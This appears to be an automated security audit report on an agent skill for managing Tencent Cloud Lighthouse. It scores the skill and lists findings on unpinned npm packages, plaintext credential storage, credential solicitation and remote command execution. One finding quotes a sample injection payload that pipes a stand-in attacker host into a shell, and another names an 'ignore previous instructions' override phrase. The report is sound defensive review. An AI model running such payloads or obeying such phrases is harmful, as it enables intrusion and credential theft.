Is lhanyun/tencentcloud-lighthouse-skill safe?

https://github.com/openclaw/skills/tree/main/skills/lhanyun/tencentcloud-lighthouse-skill

Overall score: 77 · Verdict: CAUTION

This is a legitimate Tencent Cloud Lighthouse management skill with no direct prompt injection or active exfiltration attempts. However, it presents meaningful supply chain risk through an unpinned npx -y lighthouse-mcp-server invocation that executes on every MCP server start, combined with user cloud credentials stored in plaintext in ~/.mcporter/mcporter.json — a compromised npm package version would silently gain access to those credentials. Additionally, the setup.sh script directly interpolates user-provided credentials into an inline Node.js string without escaping, creating a potential code injection path.

Category Scores (score out of 100 · weight in the overall score)

Prompt Injection       83/100 · weight 30%
Data Exfiltration      72/100 · weight 25%
Code Execution         65/100 · weight 20%
Clone Behavior         90/100 · weight 10%
Canary Integrity       92/100 · weight 10%
Behavioral Reasoning   65/100 · weight 5%

Findings (8; severity and score deduction for each)

HIGH (-20): Unpinned npx package executed on every MCP server start

setup.sh configures the lighthouse MCP server to run via npx -y lighthouse-mcp-server with no version pin, no integrity check, and no --ignore-scripts. This means whatever version the npm registry currently tags as latest is downloaded and executed every time mcporter starts the server. A compromised or typosquatted package version would silently gain access to the host and to ~/.mcporter/mcporter.json (which contains cloud API credentials) without any reinstallation step.

HIGH (-15): Shell interpolation of user credentials into inline Node.js — code injection risk

setup.sh constructs a Node.js script string by interpolating the bash variables $SECRET_ID and $SECRET_KEY directly into a double-quoted shell string that holds the JavaScript source. If a user or attacker supplies a credential value containing single quotes or Node.js expression syntax (e.g., '; require('child_process').execSync('curl attacker.com | sh'); var x = '), the embedded script executes attacker-controlled Node.js on the local machine with the user's privileges. While exploitation requires a user to provide a malicious credential, the pattern is unsafe and breaks if standard Tencent Cloud credentials ever contain these characters.

MEDIUM (-15): Credential solicitation embedded as first-class agent instruction

SKILL.md instructs the agent to ask the user for their Tencent Cloud SecretId and SecretKey and then pass those values as command-line arguments to setup.sh. The credentials appear in the agent's context window and in shell process arguments (potentially visible in /proc). While this is the intended functionality, a malicious skill author could use the identical pattern to harvest credentials for a different service.

MEDIUM (-13): Cloud API credentials stored in plaintext config

The setup script writes the user's Tencent Cloud API credentials in plaintext to ~/.mcporter/mcporter.json. Any process running as the same user (including other skills, browser automation, or a compromised npm package) can trivially read this file and access cloud resources with full API permissions.

MEDIUM (-10): execute_command (TAT) provides root-equivalent access to cloud VMs via the agent

The SKILL.md documents and encourages use of lighthouse.execute_command which runs arbitrary shell or PowerShell commands on cloud instances. If this skill is active alongside a prompt-injection-vulnerable skill or a malicious user request, the agent could be directed to run arbitrary commands on production cloud infrastructure, exfiltrate data, install backdoors, or destroy resources.

LOW (-5): Canary credential files accessed during audit — attributable to audit harness

inotifywait and auditd PATH records show that .env, .ssh/id_rsa, .aws/credentials, .npmrc, .docker/config.json, and GCP credentials were opened in two time windows (Unix timestamps 1771924108 and 1771924132). Process lineage and timing match the audit harness's own canary placement and verification passes (sudo context, preceding skill installation at 1771924127). The canary integrity check confirms no exfiltration occurred. This is not attributed to the skill.

LOW (-5): Global npm package installation without version pin

setup.sh runs npm install -g mcporter without a version constraint. While mcporter appears to be the legitimate CLI for the openclaw ecosystem, installing global npm packages without pinning creates a persistent software dependency that could be exploited via a future supply chain compromise of the mcporter package.

INFO (0): No hidden instructions, encoding tricks, or persona manipulation detected

Full review of SKILL.md found no invisible unicode characters, HTML comments, base64-encoded instructions, 'ignore previous instructions' directives, or attempts to override system prompt behavior. The skill's instructions are transparent and scoped to Tencent Cloud Lighthouse management.